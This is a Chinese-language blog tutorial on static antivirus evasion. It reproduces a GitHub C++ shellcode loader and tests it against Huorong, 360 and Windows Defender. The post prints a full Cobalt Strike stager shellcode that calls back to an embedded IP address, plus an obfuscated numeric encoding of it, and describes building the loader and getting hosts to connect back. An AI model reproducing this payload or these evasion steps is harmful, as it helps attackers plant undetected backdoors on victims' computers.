【免杀】C++静态免杀学习
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
更新时间:2022.05.10
1. 别人的静态免杀
在Github
上看到一个c++
的免杀,在4月6号的时候,还是bypass
很多的,但是一个月过去了,我执行之后发现了只能过火绒:
项目地址:https://github.com/G73st/BypassAV
2. 复现其他师傅的免杀
2.1 c++部分
其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode
,在这里先将别人的代码下载下来,在本地跑一下:
先把项目下载,然后把shellcode loader
中的BypassAV.cpp
代码复制下,然后新建项目打开,因为直接打开BypassAV.sln
的话,加载会出错:
新建一个项目:
在这里找到你要新建的文件夹:
在这里选择空项目,关闭安全开发生命周期检查,然后选择完成:
然后在源文件的位置->添加->新建项:
选择添加c++
文件,并修改名称:
将作者的代码复制过来:
此时告一段落,现在来搞另外一个部分:混淆代码
2.2 代码混淆
在本地启动cs
:
本地建立监听:
此时生成后门文件:
在这里选择c格式,在这里记得选择32
位的,不要选择64
位的,不然程序执行无效:
生成的shellcode
如下:
/* length: 796 bytes */
unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x21x03x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx75x38x4bx64x00x6cx30x45x1dx60xa2x8axdcx45x09x45x30xd9x69xecx89x91x91xcbxd4xd0x9cx2ax9cx2bxb9xf9xa4x97x1cx8ax3ax5axb8x90xfcx18xccx1fx36x48xb8x2fx31xdax2bx21xf6x23xeax5bxcbx04xe0x89x63x96x99xfbx18x1fxbex66x3axc6xd3xe9x74xe7xa9x3cxbbxa6x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x38x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x3bx20x53x4cx43x43x32x3bx20x2ex4ex45x54x20x43x4cx52x20x32x2ex30x2ex35x30x37x32x37x29x0dx0ax00x78x98x9cx68x36x3axddx1dx97xb8x34xb0xdaxc1xacxdfxbcx88xfax09x03x20xf9x38x9bx35xd3x55x2fx84x49x9bxc4x71x1ax9exe8x6ax8cx4dx32x2fx49x1ax51xa5x58xdbx09x46x7bx62x78xb1x01xf1x39x35xd4x2dx4dx81xa9x90x19x67xeex34x84xbex0dx95xf3x0fx4exeexddx6axddx54x09x92x00x1fx6fx52x91xd0x96x3fx86x90x36x71x09x8bx87xe4x34xf5x1axbax44xbbx67x9cx7cx25x7cx3ax0cxa5x0fx2bx16x7cxadx93x52x35x9ax5fx4cxafx11xafx12xf5xadxb7x44xbex4ex42xc6xc8xd6xdax4ex50xdcxd7x64x78x97x9ex41x43x9exe3x32x72x43xe0x79xccx0cxe6xc6x2fxb8x69x82xf7xecx6bx20x1dx3dx69xd5x87xabx85xd0x1bx42x5axadxd2xb0x65x11x5ex70xa9x42x2ex4exb9xbcx00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x30x2ex33x30x2ex33x2ex31x33x36x00x19x69xa0x8d";
在这里拿纯净的shellcode
部分:
xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x21x03x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx75x38x4bx64x00x6cx30x45x1dx60xa2x8axdcx45x09x45x30xd9x69xecx89x91x91xcbxd4xd0x9cx2ax9cx2bxb9xf9xa4x97x1cx8ax3ax5axb8x90xfcx18xccx1fx36x48xb8x2fx31xdax2bx21xf6x23xeax5bxcbx04xe0x89x63x96x99xfbx18x1fxbex66x3axc6xd3xe9x74xe7xa9x3cxbbxa6x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x38x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x3bx20x53x4cx43x43x32x3bx20x2ex4ex45x54x20x43x4cx52x20x32x2ex30x2ex35x30x37x32x37x29x0dx0ax00x78x98x9cx68x36x3axddx1dx97xb8x34xb0xdaxc1xacxdfxbcx88xfax09x03x20xf9x38x9bx35xd3x55x2fx84x49x9bxc4x71x1ax9exe8x6ax8cx4dx32x2fx49x1ax51xa5x58xdbx09x46x7bx62x78xb1x01xf1x39x35xd4x2dx4dx81xa9x90x19x67xeex34x84xbex0dx95xf3x0fx4exeexddx6axddx54x09x92x00x1fx6fx52x91xd0x96x3fx86x90x36x71x09x8bx87xe4x34xf5x1axbax44xbbx67x9cx7cx25x7cx3ax0cxa5x0fx2bx16x7cxadx93x52x35x9ax5fx4cxafx11xafx12xf5xadxb7x44xbex4ex42xc6xc8xd6xdax4ex50xdcxd7x64x78x97x9ex41x43x9exe3x32x72x43xe0x79xccx0cxe6xc6x2fxb8x69x82xf7xecx6bx20x1dx3dx69xd5x87xabx85xd0x1bx42x5axadxd2xb0x65x11x5ex70xa9x42x2ex4exb9xbcx00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x30x2ex33x30x2ex33x2ex31x33x36x00x19x69xa0x8d
直接执行python3 BypassAV.py
之后,会出现卡死的问题,所以这里进行了一个小小的改动:我直接把input
屏蔽掉了,然后直接输出。
然后等待加密完成:
生成混淆之后的shellcode
:
527019643837973707320415151528632043778218372532553208237213320823722732082372753208322121522932302412032183799218328732472652843271172112073280375422012328837763715237234320823722632082662651237533208261327532003287322624112375323532082472713208233207123722377426524032082973208123721218379921832873247328037542201232882963771322437111032793713298327920632243776233320823320612372232573208227249320823327312372232081132081237533204263206206282282284238285232379937712332892853208223370932012803251322532523226153251322832593225325923132512463228203143799372021837992342342342342343251293236327232643799372037003207151515282218375223223232561023223232512001015152302353251234320432983283379937203709322728221837252373251151726132072372372372302372353251370923921629837993720320432833202328923521837992342343256379923023632512191627132703799372032003287229320732891215152183799320037163226113204371837091832513245328437762803799372032043280325126820028121837993720218379923432561423223623532513230234377122237993720328215214151529432883226323021837993700321912151537003752121515370732083799379937992143224296249325515325321326827828632673203377526818268213372432593706320432193219375037273753329621732962103239371832613292273320329328532313211379727137512022912473231214218372321020037162093701282375011377132042883295329037922712023285325729332833722370032263702326826532343266152393229325232212192693250325232253226293207244322232773259325332532842142972162132072152883222325832272843226325928332533252298207244230240268207296216213298207234325932253255322232283229207243231207291216218298207234248234291297298207231322132593255325232253226214297216213298207230246264264295298207216243268231207264246237207295216213216290213299295299212220225153275329732963251291293377227832923231297324637233280324737703233320637951810207371829632992903722239214320724032993286322027632933707325632152442952142402762323269233372818245327028332753244123712294290372721924432783268321127932503703297320732852203218371022924337033772325637722311832161520232222373219375332952603201321129132201832083209377329737192763236263323432503296327120432712932273269229210277327132403214237290329128924632492243249223371932403230263328524326632833755372137232432353775372932553275329232932692643293377429532212643771327237512273705328321432313259320537143706325420727826232593720320932423200375327426628532403725324632522242813227326826621624332393233153251371532323267236379937203256261325115226151532511515261152343251233326123037783799372032143239151515151237242322303204370223432511520715152302363251223329532043776379937203200328732263283320814123289320032873224377823332893707326837903799379921821321629221321629221621829229115279325932653212
放到原代码中:
选择Release
:
选择生成解决方案:
此时生成成功:
2.3 上线测试
2.3.1 无杀软的情况_Windows10
双击之后即可上线:
2.3.2 火绒_Windows7
2.3.3 360_Windows_失败
关闭360
的自动提交样本:
按位置扫描:
经过多次操作发现,当把shellcode
剔除之后再打包,依旧被杀,360
应该是对其中的某些关键字或操作进行了查杀,属于乱杀!
2.3.4 Windows Defender最新版
直接上去就没了,但是windows Defender
的优点就在于当你不加载shellcode
的时候,是不会静态查杀的!
3. 免杀Windows Defender
对于作者一个月以前的更新,可以过Windows Defender
,但是现在只能免杀火绒,在这里对此做一个小小的改动,就可以达到以前的那种效果,但是依旧无法过360(因为免杀一直会被标记,此处的tips
暂不提供,希望师傅能够理解)
此时最新版的Windows Defender
上线成功:
但是!!!这里依旧无法过360
。
4. 总结
在这个项目中,有一些坑:
- • 程序必须自己建一个工程,导入
c++
代码 - •
shellcode
必须是32
位的,不能是64
位的(我64位失败) - • 代码混淆部分,我也是建议各位将
shellcode
复制进去,直接出结果!(可能只有我受影响) - • 生成的程序在某些
windows10
或windows7
上无法有效运行!!!
当然,在这个免杀中,均属于静态免杀,有些属于乱杀,就像碰到易语言一样,大家都杀!
在这里看到作者对于shellcode
进行了混淆,主要是CS
的shellcode
现在烂大街了,谁家AV
没法查杀的话,就太丢面了,其实也可以使用msf
来混淆shellcode
,但是感觉作者这个思路蛮好的,作者在项目中说当时将shellcode
从本地加载改到了内部加载,其实我更倾向于分离免杀,甚至远程加载!
又学到新的姿势了,以上内容仅供参考,后续我再更新其他的吧!
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5148.html